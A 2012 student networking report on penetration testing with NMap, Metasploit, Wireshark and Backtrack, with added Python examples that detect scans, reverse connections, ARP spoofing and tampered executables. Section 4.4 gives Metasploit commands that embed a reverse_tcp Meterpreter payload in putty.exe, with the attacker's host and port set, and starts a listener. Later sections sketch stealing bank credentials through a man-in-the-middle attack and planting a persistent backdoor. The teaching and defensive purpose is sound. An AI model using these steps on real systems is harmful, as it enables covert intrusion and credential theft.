Ryan A. Drozdowski, Mike Hannaford, James Royal | Florida Gulf Coast University | Fall 2012

Network Security: Penetration Tools and Wireshark

Security Assessment and Analysis with

Penetration Tools and Wireshark

(Final Draft)

Ryan A. Drozdowski, Mike Hannaford, James Royal

Instructor: Dr. Janusz Zalewski

CNT 4104 Fall 2012 – Networks

Florida Gulf Coast University

Fort Myers, Florida

12-11-2012


1. Introduction

Network security is important whether the network is personal or business: the information on it must not be accessible to unauthorized users, and it must not be easy to reach without proper permission. Penetration tools are well suited to testing the security of a network because they are very similar to what attackers actually use, depending on the software. [7] A heavily supported operating system that bundles many penetration tools is Backtrack. Although this project uses only a few features of Backtrack, many more are available. A good starting tool is NMap, which allows someone to map out the activity on the network and alert the user to possible security issues. [1] Then there is Metasploit, a tool used to perform attacks, also known as exploits, against a certain part of the network. [2] Metasploit can be used to break into a network and do serious damage to a computer on it. Wireshark is a great tool for monitoring and analyzing data transfer [6]. As data travels over a wire or a wireless network, WireShark picks up the packets traveling over the network and makes them available to the user through a sophisticated graphical user interface.

This project is an extension of previous class projects using these three tools, Metasploit, NMap and WireShark, with the addition of the Backtrack 5 operating system. The following section provides brief introductions to all three tools, Metasploit, NMap, and WireShark, and discusses the problem addressed in this project and the methods of its solution.


2. Previous Accomplishments

2.1 Metasploit

The previous project’s objective was to install Metasploit on a virtual machine to perform penetration testing. With the virtual machines in place, the main goal was to find vulnerabilities and deliver payloads to these virtual machines. Once that test was completed, the next goal was to test it against the Computer Science lab network to see whether vulnerabilities existed and, if so, exploit them.

The project started with downloading Metasploit and basic configuration. The Metasploit application was installed on a Windows platform running Windows 7 x64. For the installation of the Metasploit framework, all firewalls and anti-virus software had to be shut down because, given the nature of penetration testing, the computer you are working on may treat you as an intruder and block certain actions.

Oracle’s VirtualBox was installed as the virtual machine host on the same machine on which Metasploit was installed. Once VirtualBox was installed, virtual machines were run with Ubuntu Linux and Windows XP.

The last piece of software installed on the machine was Armitage. Armitage is a user interface for Metasploit, which makes it much easier to navigate Metasploit, itself natively a command line program. Armitage was downloaded and then set to work on the Metasploit framework installed on this machine.

Starting Armitage, which automatically activates Metasploit, and then the virtual machine running the Linux OS is required. Once both applications are running, the penetration testing is started. Armitage is then used to scan the Computer Science lab network IP address 69.88.163.0/24, as shown in Figures 2.1.1-2.1.3, to display all machines running on the network.


Figure 2.1.1- Quick Scan. [4]


Figure 2.1.2- Scan range. [4]


Figure 2.1.3 - After a scan of the network. [4]

With this, all computers available to attack are shown; the virtual machine is running on the local host with IP address 192.168.56.102. The icon of the machine can then be right-clicked to open a drop-down menu and scanned, as shown in Figure 2.1.5. When the scan completes, all ports identified are shown for the virtual machine, as illustrated in Figure 2.1.6. Then one can click Attacks on the task bar. When this is done, all the available attacks are shown under the Attacks menu. The exploit tomcat_mgr_deploy can then be selected, and a window appears with attack information; once all the information is checked, Launch is selected, as shown in Figure 2.1.7. This attack launches a Meterpreter to communicate with the attacked virtual machine. The Armitage user interface will display the attacked machine with lightning bolts, as shown in Figure 2.1.8.


Figure 2.1.4 – Local machine and Metasploitable virtual machine. [4]

Figure 2.1.5 – Drop down menu options for this machine. Select Scan. [4]

Figure 2.1.6 - Services tab for the Metasploitable machine. [4]


Figure 2.1.7 - Attack list showing available exploits. [4]

Figure 2.1.8 – Exploited Metasploitable machine.

A similar attack was attempted on the Florida Gulf Coast University Computer Science Lab Network, which proved unsuccessful. This leads to the conclusion that the network had no known vulnerabilities at that time. [4] The main goal of this previous project was achieved, but not the secondary goal, which was penetrating the Computer Science network.


2.2 NMap

The previous project’s objective was to use two different applications. The first, NMap, was used to detect open ports in the hope of finding vulnerabilities. The second application, SNORT, is an intrusion detection system. With these two applications, the goal was to use NMap to attack a computer on the network while concurrently running SNORT to try to detect the attack done by NMap.

Since the previous project’s goal was to utilize both NMap and SNORT, it started by attempting to understand the software: both its capabilities and its limitations. With this, both applications were then given a test. This was to make sure both applications behaved as anticipated.

SNORT was the first challenge, and custom SNORT detection rules using a MySQL server were written. SNORT has a feature that allows a user to write custom detection rules for a particular environment.

It was then mapped out how NMap would scan the network, as shown in Figure 2.2.1. NMap is a command line application with a lot of options; most are available on every network or environment.

Figure 2.2.1 NMap plan for attack. [5]


This was all performed within a virtual environment, with NMap running on Windows 7 and SNORT running on Ubuntu Linux, as shown in Figure 2.2.2. SNORT was started and the custom rules were imported into the system. Then the NMap application was started. SNORT, running with its custom rules imported, detected and logged all of NMap’s scans, even with NMap’s flexibility and custom command line scans.

Figure 2.2.2 Map of the Network. [5]

The conclusion of this project was that both NMap and SNORT have very useful functionality and flexibility. SNORT could be expanded with a greater set of rules to detect and log far more data, to prevent intrusion and allow for a more secure network.


2.3 Wireshark

The previous WireShark project’s primary goal was to set up the software on a Windows-based personal computer in the Computer Science lab along with a USB device called AirPcap [3]. The project was more about understanding the software and all its features, with little implementation of the software; useful data were collected, and the conclusion was drawn that one could effectively tell what was going on over a wireless network.

WireShark is an open source program downloadable from the web at wireshark.org. One must select which operating system is to be used and then select download. Along with downloading WireShark, another piece of software that must also be downloaded and installed is WinPCap. If one follows the on-screen prompt, it will ask whether one wishes to install it, so make sure it is selected, as shown in Figure 2.3.1.

Figure 2.3.1 Prompt to download WinPCap. [1]

The next step is to insert the AirPcap USB device. Once inserted, it will prompt to download the driver. This must be done to use the software, as shown in Figure 2.3.2. Once all this software has been downloaded, one can launch WireShark and sniff packets over a wireless network.

Figure 2.3.2 Prompt to download the AirPcap driver. [1]

With WireShark running, one must select the AirPcap as the interface. Then the scan automatically starts, as shown in Figures 2.3.3-2.3.4. Once running, it was discovered that one could filter the scan either by IP filters or by protocol filters. This was used to limit the scan to only “cups”, that is, packets using the Common Unix Printing System protocol [1], as shown in Figure 2.3.5. After some analysis of the data, Apple computers were singled out and their IP addresses and the type of printer were displayed, as shown in Figure 2.3.6.


Figure 2.3.3 Select AirPcap as the interface. [1]

Figure 2.3.4 Sniffing packets over the network. [1]


Figure 2.3.5 The filtered out packets. [1]

Figure 2.3.6 Displays the individual packets with their relevant data. [1]


3. Problem Description

Given the four tools described in the previous section, the plan was to attempt to hack into a computer or embedded system over the Computer Science lab wireless network. Each of the three penetration tools, NMap, Metasploit, and WireShark, will have its own role to play, with the addition of Backtrack [11].

Backtrack’s role is to be the intermediary, as it has NMap and Metasploit built in to its framework. This software has integrated both programs, making it the top choice for the project to execute a successful attack. Backtrack is installed onto the attacking computer, giving us access to the penetration tools.

NMap’s role is to detect and map out all the computers on the wireless network shown in Figure 3.1. NMap gives the potential ability to see IP addresses, open ports, closed ports and the operating system associated with the machine at a given IP address. This constitutes the first part of the project, which is mapping out the network.

Figure 3.1 - Computer Science Wireless Network.


Metasploit is then used to create an exploit that disguises an attacking program to look like a normal program, for example “putty.exe”. When this exploit is placed on a USB stick and the user clicks on it and saves the file, they receive a “putty.exe” file with the exploit embedded. Once the program “putty.exe” is launched on the user’s computer, it functions like “putty.exe”, but the exploit notifies the attacking computer that the file is up and running. This allows some ports to open on that machine so that Metasploit can then penetrate it without the knowledge of the user and perform attacks against it.

WireShark can be used for monitoring the attack and watching the data packet exchange. The monitoring can be started from the NMap scan, through the exploit being installed, to the attack being performed by Metasploit. With this knowledge, the idea is to see whether an attack can be done on another device and whether the attack could be prevented by determining if certain packet transfers are malicious attacks on the network shown in Figure 3.2.

Figure 3.2 – Map of the Attack over the Network: Computer 1 attacking Computer 2 while Computer 5 monitors all packet transfer.

4. Preparation


4.1 NMap the CS Network

NMap is used to map out the Computer Science lab’s wireless network. The first task is to analyze the network which is going to be attacked, and NMap is perfect for this task. The first command the project requires is “nmap -O 69.88.163.0/24”, as shown in Figure 4.1. This command allows one to see all systems in the IP address range 69.88.163.0/24 and displays their operating systems. These data can be used to customize an exploit to attack a specific computer. The one selected will be a Windows 7 PC with the IP address 69.88.163.240.

Figure 4.1 Command to display operating systems on the IP range 69.88.163.0/24.
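What this scan looks like from the IDS side, as an added example that is not part of the paper: the custom SNORT rules of the earlier project (Section 2.2) flagged NMap's scans, and the sliding-window check below does the same job in plain Python so the logic is visible. The packet records, the 5-second window and the 20-port threshold are constructed for the example; the addresses are the paper's.

```python
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """One TCP connection attempt as an IDS would see it (constructed records)."""
    ts: float      # seconds since capture start
    src: str
    dst: str
    dport: int
    syn: bool      # True for a SYN without ACK, i.e. a new connection attempt


# Tunables; these thresholds are assumptions for the example, not values from the paper.
WINDOW_SECONDS = 5.0
DISTINCT_PORT_THRESHOLD = 20


def detect_port_scans(packets, window=WINDOW_SECONDS, threshold=DISTINCT_PORT_THRESHOLD):
    """Return one alert per (src, dst) pair whose SYNs hit at least `threshold`
    distinct destination ports within any `window`-second span.

    Each alert is (src, dst, first_ts_in_window, distinct_ports_at_trigger).
    """
    history = defaultdict(deque)   # (src, dst) -> deque of (ts, dport), oldest first
    alerted = set()
    alerts = []
    for p in sorted(packets, key=lambda x: x.ts):
        if not p.syn:
            continue
        key = (p.src, p.dst)
        q = history[key]
        q.append((p.ts, p.dport))
        # drop probes that fell out of the sliding window
        while q and p.ts - q[0][0] > window:
            q.popleft()
        distinct = {port for _, port in q}
        if len(distinct) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((p.src, p.dst, q[0][0], len(distinct)))
    return alerts


def sample_traffic():
    """Constructed traffic using the paper's addresses: the attacking host
    (69.88.163.15) probes ports 1-100 of the Windows 7 target (69.88.163.240)
    at 10 ms intervals, while a third host only browses ports 80 and 443."""
    scanner, target, client = "69.88.163.15", "69.88.163.240", "69.88.163.50"
    pkts = [Packet(ts=0.01 * i, src=scanner, dst=target, dport=port, syn=True)
            for i, port in enumerate(range(1, 101))]
    pkts += [Packet(ts=0.5 * i, src=client, dst=target, dport=80 if i % 2 else 443, syn=True)
             for i in range(30)]
    return pkts


if __name__ == "__main__":
    for src, dst, t0, n in detect_port_scans(sample_traffic()):
        print(f"ALERT: {src} -> {dst}: {n} distinct ports probed since t={t0:.2f}s")
```

The browsing host never exceeds two distinct ports, so only the scanner is reported; a real rule would also key on the SYN rate and on the malformed probes that OS fingerprinting (the -O option) sends, which this example leaves out.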

4.2 Running and Setting Up WireShark

WireShark is set up to monitor the Computer Science network effectively and efficiently. The AirPcap drivers need to be installed for this purpose. After installation has completed, the AirPcap has to be inserted in the USB port and the wireless networking card turned off. After all this has been completed, WireShark is ready to start, using the AirPcap as the selected sniffing interface. After several minutes, WireShark will capture about 30,000 data packets over all the wireless networks in the area. There must be a software filter to narrow down the number of recorded packets. Using the filter “ip.src == 69.88.163.240 || ip.dst == 69.88.163.240”, as shown in Figure 4.2, sorts through the data and finds only data packets sent and received by the computer with IP address 69.88.163.240, which is a computer running in the Computer Science lab. This filtering command is then saved into WireShark’s filtering system. This allows future monitoring of the planned attacks on a computer on the Computer Science wireless network. This can also be done for the attacking computer.


Figure 4.2 Filtering out ip address 69.88.163.240 as the source and destination.
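An added example, not from the paper, of how a display filter like the one above is evaluated: a small parser for a subset of Wireshark's filter syntax (`==`, `&&`, `||`, `!`, parentheses, and the fields ip.src, ip.dst, ip.addr, tcp.srcport, tcp.dstport, tcp.port) applied to constructed packet records. The `!=` operator is left out on purpose because its meaning for two-sided fields changed between Wireshark versions. Wireshark's own `ip.addr == 69.88.163.240` is the one-term equivalent of the paper's two-term filter, since ip.addr matches either endpoint.

```python
import re

# Fields this subset understands, mapped to the packet values they compare
# against. Packets are plain dicts constructed for the example, not real
# captures; the two-sided fields (ip.addr, tcp.port) match either direction,
# as they do in Wireshark.
FIELDS = {
    "ip.src":      lambda p: [p.get("ip.src")],
    "ip.dst":      lambda p: [p.get("ip.dst")],
    "ip.addr":     lambda p: [p.get("ip.src"), p.get("ip.dst")],
    "tcp.srcport": lambda p: [p.get("tcp.srcport")],
    "tcp.dstport": lambda p: [p.get("tcp.dstport")],
    "tcp.port":    lambda p: [p.get("tcp.srcport"), p.get("tcp.dstport")],
}

_TOKEN = re.compile(r"\s*(\|\||&&|==|!|\(|\)|[A-Za-z_.0-9]+)")


def tokenize(text):
    """Split a filter string into operator and operand tokens."""
    tokens, pos, text = [], 0, text.strip()
    while pos < len(text):
        m = _TOKEN.match(text, pos)
        if not m:
            raise ValueError(f"cannot tokenize filter near {text[pos:]!r}")
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


class Parser:
    """Recursive-descent parser: or -> and -> not/parentheses -> comparison."""

    def __init__(self, tokens):
        self.toks, self.i = tokens, 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else None

    def take(self, expected=None):
        tok = self.peek()
        if tok is None or (expected is not None and tok != expected):
            raise ValueError(f"expected {expected or 'a token'}, got {tok!r}")
        self.i += 1
        return tok

    def parse(self):
        node = self.parse_or()
        if self.peek() is not None:
            raise ValueError(f"unexpected token {self.peek()!r}")
        return node

    def parse_or(self):
        node = self.parse_and()
        while self.peek() == "||":
            self.take()
            node = ("or", node, self.parse_and())
        return node

    def parse_and(self):
        node = self.parse_not()
        while self.peek() == "&&":
            self.take()
            node = ("and", node, self.parse_not())
        return node

    def parse_not(self):
        if self.peek() == "!":
            self.take()
            return ("not", self.parse_not())
        if self.peek() == "(":
            self.take()
            node = self.parse_or()
            self.take(")")
            return node
        field = self.take()
        if field not in FIELDS:
            raise ValueError(f"unsupported field {field!r}")
        self.take("==")
        return ("cmp", field, self.take())


def evaluate(node, packet):
    """Evaluate a parsed filter tree against one packet record."""
    kind = node[0]
    if kind == "cmp":
        _, field, value = node
        present = [str(v) for v in FIELDS[field](packet) if v is not None]
        return value in present
    if kind == "not":
        return not evaluate(node[1], packet)
    if kind == "and":
        return evaluate(node[1], packet) and evaluate(node[2], packet)
    return evaluate(node[1], packet) or evaluate(node[2], packet)


def filter_packets(expr, packets):
    """Return the frame numbers of the packets matching a display filter."""
    tree = Parser(tokenize(expr)).parse()
    return [p["no"] for p in packets if evaluate(tree, p)]


# Constructed frames using the paper's addresses (attacker .15, target .240).
SAMPLE_PACKETS = [
    {"no": 1, "ip.src": "69.88.163.15", "ip.dst": "69.88.163.240", "tcp.srcport": 44321, "tcp.dstport": 445},
    {"no": 2, "ip.src": "69.88.163.240", "ip.dst": "69.88.163.15", "tcp.srcport": 49152, "tcp.dstport": 5001},
    {"no": 3, "ip.src": "69.88.163.50", "ip.dst": "198.51.100.10", "tcp.srcport": 51000, "tcp.dstport": 443},
    {"no": 4, "ip.src": "69.88.163.240", "ip.dst": "69.88.163.1", "tcp.srcport": 49153, "tcp.dstport": 53},
]

if __name__ == "__main__":
    paper_filter = "ip.src == 69.88.163.240 || ip.dst == 69.88.163.240"
    print(paper_filter, "->", filter_packets(paper_filter, SAMPLE_PACKETS))
    print("ip.addr == 69.88.163.240 && tcp.port == 5001 ->",
          filter_packets("ip.addr == 69.88.163.240 && tcp.port == 5001", SAMPLE_PACKETS))
```

Narrowing the saved filter with `&& tcp.port == 5001` isolates the handler traffic of Section 4.4 from the rest of the target's conversations, which is the view a monitor on Computer 5 in Figure 3.2 would want.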

4.3 Backtrack Setup

Backtrack is the operating system used in this project to facilitate the attacks. It is saved on a USB stick so it can be used on any computer. To launch the operating system, one must first go into the BIOS of the computer and change the system boot order so that the USB is first in the order. Once that has been completed, the boot screen will then confirm whether one wants to boot from USB. Once the operating system is booted on the computer, there is another boot screen from Backtrack. The option that must be selected is Backtrack persistent text mode boot. Then a command prompt appears; start the desktop with “startx”. Once it has finished loading, the Backtrack operating system is ready to use, as shown in Figure 4.3.

Figure 4.3 Backtrack desktop screen.

4.4 Customizing an Exploit using Metasploit


Metasploit is a built-in application within the Backtrack operating system. To start Metasploit, one must start up a Konsole window. Once the Konsole window is started, the command “msfconsole” must be entered. This will launch the Metasploit console, as shown in Figure 4.4. If at any time one needs help in the Metasploit window, the command “help” can be entered.

Figure 4.4 Metasploit framework.

To create an exploit, one must first know what payload one wishes to use. For the project, we used NMap and found a Windows 7 PC, so the selected payload was reverse TCP. To create this exploit, one must type “use payload/windows/meterpreter/reverse_tcp”, as shown in Figure 4.5. Once the payload is loaded into Metasploit, type “show options” to see what is required for this payload, as shown in Figure 4.6. This will show that the LHOST and LPORT must be set. The LHOST is the listening computer’s IP address and the LPORT is the port that the computer will be listening on. To set the LHOST, type “set LHOST = 69.88.163.15”. To set the LPORT, type “set LPORT = 5001”. Those are the attributes of our attacking computer. With these properties set, one can create the exploit. The exploit can be attached to any executable, so the chosen program was “putty.exe”.

To generate this infected program, type “generate -k -t exe -x /tmp/putty.exe -f /tmp/putty_pro.exe”, as shown in Figure 4.7. The “-k -t exe” tells the exploit generator that the program being generated will have the extension exe. The “-x /tmp/putty.exe” tells the exploit generator the source file path. Then the “-f /tmp/putty_pro.exe” tells the exploit generator the new executable’s name and file path. Once the file is created, type “back” to exit the payload menu and return to the main menu within Metasploit.

Figure 4.5 Loading the reverse TCP payload.


Figure 4.6 Shows options for the payload.

Figure 4.7 Generates the infected executable.

Now that the exploit has been created, it is time to launch the listener for that exploit. Type “use exploit/multi/handler”, as shown in Figure 4.8; this will bring you to the screen where one can listen for the exploit. Once again, one must set both the LHOST and LPORT to the IP address and the port number that were selected for the payload, as shown in Figure 4.9. Once that has been completed, typing “exploit” will launch the program, as shown in Figure 4.10.


Figure 4.8 Launches the exploit handler.

Figure 4.9 Sets the listening host.


Figure 4.10 Starts to listen for the exploit.


5. Implementation

5.1 Methodology

5.1.1 Reverse TCP

The reverse TCP connection is usually used to bypass firewall restrictions on open ports. The firewall usually blocks inbound connections to open ports but does not block outgoing traffic. In a normal forward connection, a client connects to a server through the server's open port, but in the case of a reverse connection, the client opens the port that the server connects to. The most common use of a reverse connection is to bypass firewall and router security restrictions.
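Seen from the defender's side, the property described above is also what gives a reverse connection away: the victim, not the attacker, is the originator, so the session shows up in connection logs as an outbound flow from a workstation to an unexpected port. The following added example (not part of the paper) scores constructed connection records against that pattern; the lab range and the handler address and port come from Sections 4.1 and 4.4, while the column layout, the port allowlist, the known-server list and the 60-second threshold are assumptions.

```python
import ipaddress
from dataclasses import dataclass

LAB_NET = ipaddress.ip_network("69.88.163.0/24")      # the lab range scanned in Section 4.1
KNOWN_SERVERS = {"69.88.163.1"}                        # assumption: the lab's gateway/DNS host
EXPECTED_OUTBOUND_PORTS = {22, 53, 80, 123, 443, 993}  # assumption: what workstations normally use
LONG_LIVED_SECONDS = 60.0                              # assumption: interactive-session threshold


@dataclass(frozen=True)
class Conn:
    ts: float
    orig_h: str   # originator (the side that sent the SYN)
    orig_p: int
    resp_h: str   # responder (the side that was listening)
    resp_p: int
    proto: str
    duration: float
    orig_bytes: int
    resp_bytes: int


def parse_conn_log(text):
    """Parse tab-separated connection records; the column layout is this
    example's own simplified one, not any particular IDS's native format."""
    conns = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split("\t")
        conns.append(Conn(float(f[0]), f[1], int(f[2]), f[3], int(f[4]),
                          f[5], float(f[6]), int(f[7]), int(f[8])))
    return conns


def reverse_session_reasons(c):
    """Why this record looks like a reverse connection, or [] if it does not.

    In a reverse connection the victim is the originator, so the evidence is an
    outbound flow from a workstation, not an inbound one the firewall would see."""
    if c.proto != "tcp" or ipaddress.ip_address(c.orig_h) not in LAB_NET:
        return []
    reasons = []
    if c.resp_p not in EXPECTED_OUTBOUND_PORTS:
        reasons.append(f"outbound to unexpected port {c.resp_p}")
    if c.duration >= LONG_LIVED_SECONDS:
        reasons.append(f"long-lived session ({c.duration:.0f}s)")
    if ipaddress.ip_address(c.resp_h) in LAB_NET and c.resp_h not in KNOWN_SERVERS:
        reasons.append(f"responder {c.resp_h} is a peer workstation, not a known server")
    return reasons


def find_reverse_sessions(conns, min_score=2):
    """Return (conn, reasons) for records with at least `min_score` indicators."""
    hits = []
    for c in conns:
        reasons = reverse_session_reasons(c)
        if len(reasons) >= min_score:
            hits.append((c, reasons))
    return hits


# Constructed records. The first line is what the paper's setup would produce:
# the target (69.88.163.240) connecting out to the handler on 69.88.163.15:5001.
SAMPLE_CONN_LOG = """\
#ts\torig_h\torig_p\tresp_h\tresp_p\tproto\tduration\torig_bytes\tresp_bytes
1355259000.0\t69.88.163.240\t49152\t69.88.163.15\t5001\ttcp\t845.2\t20480\t734000
1355259005.0\t69.88.163.240\t49153\t69.88.163.1\t53\tudp\t0.1\t64\t180
1355259010.0\t69.88.163.50\t51000\t198.51.100.10\t443\ttcp\t12.5\t3500\t48000
1355259020.0\t69.88.163.50\t51001\t69.88.163.1\t22\ttcp\t900.0\t15000\t22000
"""

if __name__ == "__main__":
    for c, reasons in find_reverse_sessions(parse_conn_log(SAMPLE_CONN_LOG)):
        print(f"ALERT {c.orig_h}:{c.orig_p} -> {c.resp_h}:{c.resp_p}: " + "; ".join(reasons))
```

The long SSH session to the gateway scores only one indicator and stays quiet, which is the point of requiring two: any single signal (an odd port, a long connection, a peer-to-peer flow) is common on its own, and the reverse session is the record that combines them. Egress filtering that only permits the expected ports removes the assumption the text above relies on, that outgoing traffic is never blocked.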

5.1.2 Trojan Horse

The Trojan Horse is an executable running on the computer behind a firewall. This can open an outgoing connection to an external source. Once the connection is made, one can send commands to that computer.

5.1.3 Man in the Middle

Another benefit of using Backtrack is the availability of Ettercap. Ettercap is a piece of software which makes initiating a man in the middle attack easy. A man in the middle attack is the process of routing all data packets on the specified network through a given computer on the network before sending them out to the Internet. This attack allows the computer initiating the attack to validate packets and reroute them as needed.

A malicious example of this would be if some of the users of the network used it to do their online banking. The user generating the man in the middle attack wants all usernames and passwords of the users on the network attempting to access Bank of America's website. The user generating the man in the middle attack would then sift through all the data packets on the network, rerouting the packets with the destination IP address of Bank of America's website to a different destination IP of the attacker's choosing, which serves a clone of the Bank of America website. The end user has no knowledge of the reroute and would continue to enter their login credentials as usual. Once the user hits the submit button, the attacker gains their private information.
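The rerouting described above is, in Ettercap's usual mode, done by ARP poisoning, and its footprint on the LAN is the signal a defender can watch for: an IP address, most importantly the gateway's, that suddenly answers from a different MAC, or one MAC answering for several addresses. The following is an added example, not part of the paper, over constructed ARP replies; the lab addresses are the paper's, while the MAC addresses and the input layout are made up.

```python
from collections import defaultdict


def parse_arp_replies(text):
    """Parse constructed 'ts sender_ip sender_mac' lines (a simplified layout
    for the example, not a capture file format)."""
    replies = []
    for line in text.strip().splitlines():
        ts, ip, mac = line.split()
        replies.append((float(ts), ip, mac.lower()))
    return replies


def detect_arp_spoofing(replies, gateway_ip, max_ips_per_mac=2):
    """Return (ts, severity, message) alerts from a stream of ARP replies.

    Two signals: an IP whose MAC changes (the classic poisoning symptom, HIGH
    when the IP is the gateway because that is what puts a host between the
    victims and the Internet), and one MAC answering for more addresses than a
    normal host would."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in sorted(replies):
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            severity = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append((ts, severity, f"{ip} moved from {previous} to {mac}"))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == max_ips_per_mac + 1:   # fires once, when the limit is crossed
            alerts.append((ts, "MEDIUM", f"{mac} now answers for {len(mac_to_ips[mac])} addresses"))
    return alerts


# Constructed replies with the paper's lab addresses and made-up MACs:
# the gateway (.1) and the target (.240) announce normally, then the attacking
# host (.15) answers for both of them, placing itself between the two.
SAMPLE_ARP = """
1.0 69.88.163.1   02:00:00:00:00:01
2.0 69.88.163.240 02:00:00:00:02:40
3.0 69.88.163.15  02:00:00:00:00:15
4.0 69.88.163.1   02:00:00:00:00:15
5.0 69.88.163.240 02:00:00:00:00:15
"""

if __name__ == "__main__":
    for ts, sev, msg in detect_arp_spoofing(parse_arp_replies(SAMPLE_ARP), gateway_ip="69.88.163.1"):
        print(f"t={ts:.0f}s {sev}: {msg}")
```

A gateway that legitimately fails over to a standby with a different MAC will also trip the HIGH alert, so the gateway's known MACs belong in an allowlist in practice. Even when the reroute itself goes unnoticed, a cloned banking site served over HTTPS cannot present the bank's certificate, so the browser's certificate warning is the signal the end user is left with.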

5.1.4 Daemon

This project makes use of Metasploit in order to generate payloads. Metasploit comes with several payloads for one to use, but also has the ability to generate them if one needs to. This is where daemons come into play in this project. Daemons are essentially background processes in operating systems. They are scripts that run in the background. They are headless, meaning they do not have a graphical user interface. A daemon is like a small program running in the operating system that the end user does not see. Daemons can be configured to start when the operating system boots and shut down when the operating system terminates.

This project creates a payload that is disguised as the open source putty.exe application, which is used as an SSH and FTP client. The payload, which is the customized putty.exe application, looks, feels, and executes exactly like the putty.exe application downloaded from the Internet. The only difference is that when one opens this generated payload (putty.exe) file on the target system, the payload sends a reverse TCP connection back to the attacking system, which allows the attacking system access to the target system. The issue with this is that the attacking system only has access as long as our payload is running on the target system. Once the user of the target system exits the payload, it closes the reverse TCP connection.

Daemons make creating a back door into the target system a breeze. A back door is the process of creating an entry point on the target system so that the user of the attacking system can gain access to it any time they want. This would remove the limitation of our payload described in the previous paragraph. In order to create a back door on the target system, one would need to gain super user privileges on the target system. This can be achieved with some of the other tools Backtrack provides but is out of the scope of this project; what follows is only to inform one about the process of creating a back door. Once one has super user privileges on the target system, they would simply need to view the processes running on the target. Our payload is generated as a system process on the target system. One process is the true putty.exe application and the other is the reverse TCP connection back to the attacking computer. By creating a daemon, the reverse TCP connection is set to be activated when the targeted computer system starts and to stop when the system shuts down. One could then gain access to the target system at any time of the day, as long as it was turned on, without the need for the payload's execution.
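Because the generated file “looks, feels, and executes exactly like” the real putty.exe, the practical way to tell them apart is by content, not behaviour: compare the file's SHA-256 with the digest the vendor publishes (or verify its code signature) before it is run or allowed to persist. The following added example, not part of the paper, implements that allowlist check over a constructed directory; the stand-in file contents and their digests are made up for the example, and putty_pro.exe is the name the paper's generate command produced.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path, chunk_size=1 << 16):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify_manifest(directory, manifest):
    """Compare executables on disk with an allowlist of expected SHA-256 digests.

    manifest: {filename: expected_hex_digest}. Returns {filename: status} where
    status is 'ok', 'MODIFIED', 'MISSING', or 'UNLISTED' for an .exe that is
    present but has no allowlist entry at all."""
    directory = Path(directory)
    results = {}
    for name, expected in manifest.items():
        path = directory / name
        if not path.is_file():
            results[name] = "MISSING"
        elif sha256_of(path) == expected:
            results[name] = "ok"
        else:
            results[name] = "MODIFIED"
    for path in sorted(directory.iterdir()):
        if path.is_file() and path.suffix.lower() == ".exe" and path.name not in manifest:
            results[path.name] = "UNLISTED"
    return results


def demo():
    """Constructed scenario: the genuine file, a tampered copy under a trusted
    name, one allowlisted tool that is absent, and the paper's putty_pro.exe
    appearing with no allowlist entry. All bytes here are stand-ins."""
    genuine_putty = b"stand-in bytes for the genuine putty.exe"
    genuine_plink = b"stand-in bytes for the genuine plink.exe"
    manifest = {
        "putty.exe": hashlib.sha256(genuine_putty).hexdigest(),
        "plink.exe": hashlib.sha256(genuine_plink).hexdigest(),
        "pscp.exe": hashlib.sha256(b"stand-in bytes for pscp.exe").hexdigest(),
    }
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "putty.exe").write_bytes(genuine_putty)
        (d / "plink.exe").write_bytes(genuine_plink + b" with extra bytes appended")
        (d / "putty_pro.exe").write_bytes(genuine_putty + b" with extra bytes appended")
        return verify_manifest(d, manifest)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9} {name}")
```

The same check run against the entries that start at boot (the daemon of the text above) is what turns a persistence attempt into a finding: a start-up entry pointing at an UNLISTED or MODIFIED binary is worth an alert regardless of what the file is named.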

5.1.5 Exploits and Payloads

Once the best vulnerability has been discovered in a network, a small and specialized computer program, called an exploit, is used to take advantage of the vulnerability and give the penetration tester access to the computer system. The exploits are used to deliver the payloads to the target system. These payloads are the way that the penetration tester gains access to the computer. Payloads are described in the paragraphs that follow.

There are over 180 exploits in the Metasploit Framework. Since the security community is encouraged to get involved in the continuing development of exploits, there is currently a public database of usable exploits. The exploit database is constantly being updated with community support, and when new exploits are found they are posted. [4]

Payloads are pieces of code that get executed on the target system as part of an exploit attempt. A payload is usually a sequence of assembly instructions which helps achieve a specific post-exploitation objective, such as adding a new user to the remote system, or launching a command prompt and binding it to a local port.

Traditionally, payloads were created from scratch or by modifying existing pieces of assembly code. This requires in-depth knowledge not only of assembly programming, but also of the internal workings of the target operating system. A number of scripts now enable payloads to be developed without needing to modify any assembly code at all. The different types of payloads give the penetration tester different types of control over the target system. The most commonly used payload is called the Meterpreter. This payload allows the penetration tester to turn on the target system's webcam, take control of the mouse and keyboard, and even take screenshots. All of these options let the penetration tester see exactly what holes there are in the system. Having access to key functions on one computer does not necessarily mean control over the whole network, but it is a start in determining which aspects of the network are the most vulnerable. [4]

5.1.6 Backtrack 5

Backtrack Linux is an open source Linux distribution licensed under the GPL. Backtrack is used by network professionals in the industry and is considered the standard operating system for digital forensics and penetration testing. The operating system is named after the well-known backtracking algorithm. Its current version is Backtrack 5 r3, which is the version that this project is using.

Backtrack comes with Metasploit and NMap completely installed in the standard ISO image download, as well as with many other great tools for penetration testing: Aircrack-ng, which can crack WEP and WPA wireless passwords; Snort, which can sniff packets on a given network; Kismet, which is an intrusion detection system; Ophcrack, a Windows password cracker that attacks LM hashes with rainbow tables; and Ettercap, which is specifically designed for man-in-the-middle attacks. These are just a handful of the great penetration testing applications that come with Backtrack.

